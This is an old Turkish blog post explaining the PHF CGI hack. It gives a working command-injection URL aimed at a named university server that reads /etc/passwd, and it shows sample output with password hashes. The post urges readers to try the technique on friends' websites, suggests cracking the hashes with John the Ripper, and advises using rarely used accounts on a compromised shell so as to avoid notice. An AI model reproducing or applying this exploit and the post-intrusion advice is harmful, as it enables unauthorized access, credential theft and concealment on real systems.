2 Ağustos 2011 Salı

Web Hack Nedir?

WEB HACK UZERINE
WEB HACK NEDIR???
  WEB hacking bilgidim kadari ile ilk kez 1996 da FBI in web sitesini hack etmek icin kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu hatasini gidermistir. Anlatacagim teknik aslinda PHF olarak bilinir.Fakat bir cok eski server da hala uygulanmakta ve netice alinabilmektedir ozellikle japon webcilerinde bu hataya cok rastlanilir ornek vermek gerekirse:

http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  Satirini browserinize yazip enter e basin bu satir passwd dosyasini acmaya calisacaktir(adresi attim)
  Error 404
/cgi-bin/phf is not found on this server
  Bu satirlar karsiniza cikarsa bilinki server yeni ve size gecit vermiyor
  Ama asagidaki listeyi verirse bilinki buldunuz:)))
  /cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
  www-admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
  asprilla:3A62i9qr.YmO.:1012:10:kafka
  CAFER:/home/user/asprilla:/usr/local/bin/tcsh
  hasan:dvUMqNmeeENFs:1016:10:lois figo:/home/user/hasan:/bin/csh
  necmettin:ewF90K0gwXVD6:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
  güloglu:kFph8HEM/aaAA:1007:10:Kemal GULOGLU:/home/user/güloglu:/bin/csh
 
  PHF teknigini arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz:))) tabi yukardaki satirlari en iyi ihtimali goz onune alinarak yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki gibi:
  root:*:0:1:Operator:/:/bin/csh
  www-admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
  asprilla:*:1012:10:CAFER:/home/user/asprilla:/usr/local/bin/tcsh
  hasan:*:1016:10:lois figo:/home/user/hasan:/bin/csh
  necmettin:*:1006:10:mehmet CAFER:/home/user/cafer:/bin/csh
  güloglu:*:1007:10:kemal GULOGLU:/home/user/güloglu:/bin/csh

  Bu tek * sifreleri kirdigini iddia eden bazi programlar var ama ben sadece guluyorum shadowed kirmak bence imkansiz ama yinede john the ripper i cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu unutmayin.olaki bir shell aldiniz veya kirdiniz diyelim en az kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell in ait oldugu servere port 79 dan baglanin username ve pw i yazin en son baglanilan tarihi size verir az kullanilan accountlari kullanin.
Gönderen zaman:
Etiketler: , , , , , , , ,

Hiç yorum yok:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)